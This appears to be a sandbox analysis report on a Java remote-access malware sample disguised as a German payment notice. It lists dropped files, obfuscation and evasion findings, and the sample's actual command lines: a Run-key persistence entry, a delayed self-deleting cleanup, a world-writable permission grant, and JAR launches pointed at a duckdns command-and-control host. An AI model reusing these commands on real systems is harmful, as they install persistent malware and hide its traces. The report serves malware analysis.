                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dpapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: Binary string: D:\GitHub\PAExec\Release\PAExec.pdb source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: Yara match | File source: Avisierung vom 03.04.2025 Kundennummer 1084472.jar, type: SAMPLE
                    Source: Yara match | File source: 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000003.1207124995.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1204529906.0000000001150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1205204822.0000000000EFD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1367264095.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000003.2308395794.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000003.1352312193.0000000001138000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.2317473344.0000000014C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1205614657.0000000002C65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 7za.exe PID: 7636, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: java.exe PID: 7728, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: java.exe PID: 5540, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: java.exe PID: 4860, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar, type: DROPPED
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_641013E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_02348A11 push cs; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_023498FB push es; retn 0001h
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_0234ED5D push ebx; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_0234ED58 push ebx; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_0234EDFB push cs; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022AA20A push ecx; ret
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022AA21B push ecx; ret
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022ABB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022AB3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022AB947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022AC477 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 12_2_02A8A20A push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 12_2_02A8A21B push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 12_2_02A8B3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 12_2_02A8BB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 12_2_02A8B947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 12_2_02A8C477 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 23_2_02C3A20A push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 23_2_02C3A21B push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 23_2_02C3B3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 23_2_02C3BB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 23_2_02C3B947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 23_2_02C3C477 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_64114F16 push es; retf
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_6410643C push eax; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_64106891 push ebx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_641068CD push eax; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_01FDB947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_01FDB3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_01FDBB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_01FDA21B push ecx; ret

                    Persistence and Installation Behavior

                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | File created: paexec.exe.3.dr
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | File created: C:\Users\user\AppData\Local\Temp\lib\paexec.exe
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | File created: C:\Users\user\AppData\Local\Temp\systemhook-4400567111608641391.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | File created: C:\Users\user\AppData\Local\Temp\systemhook+4014254877.dll (copy)
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

                    Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lib\paexec.exe
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\systemhook-4400567111608641391.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\systemhook+4014254877.dll (copy)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | API coverage: 2.2 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
Source: java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1367264095.0000000001125000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000017.00000002.2303584809.0000000001184000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000002.2314002767.0000000000493000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000017.00000002.2303584809.000000000115B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^M
Source: java.exe, 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1367264095.0000000001125000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000017.00000002.2303584809.0000000001184000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000002.2314002767.0000000000493000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cjava/lang/VirtualMachineError
Source: java.exe, 00000003.00000003.1208285185.0000000014865000.00000004.00000020.00020000.00000000.sdmp, java.exe, 0000000C.00000003.1353732583.000000001506D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000017.00000003.2302055736.000000001526A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBn,f
Source: java.exe, 00000019.00000002.2317857862.000000006410C000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: KWNNC_NET_VMWARE 0x003f0000
Source: java.exe, 0000000C.00000002.1367264095.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_641013E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_641028BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_641028C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Memory protected: page read and write | page guard
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
Source: java.exe, java.exe, 00000019.00000002.2317857862.000000006410C000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: DOF_PROGMAN 0x0001
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 3_2_022A03C0 cpuid
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7728 VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Users\user\1967lock.file VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\5540 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\2964 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\4860 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
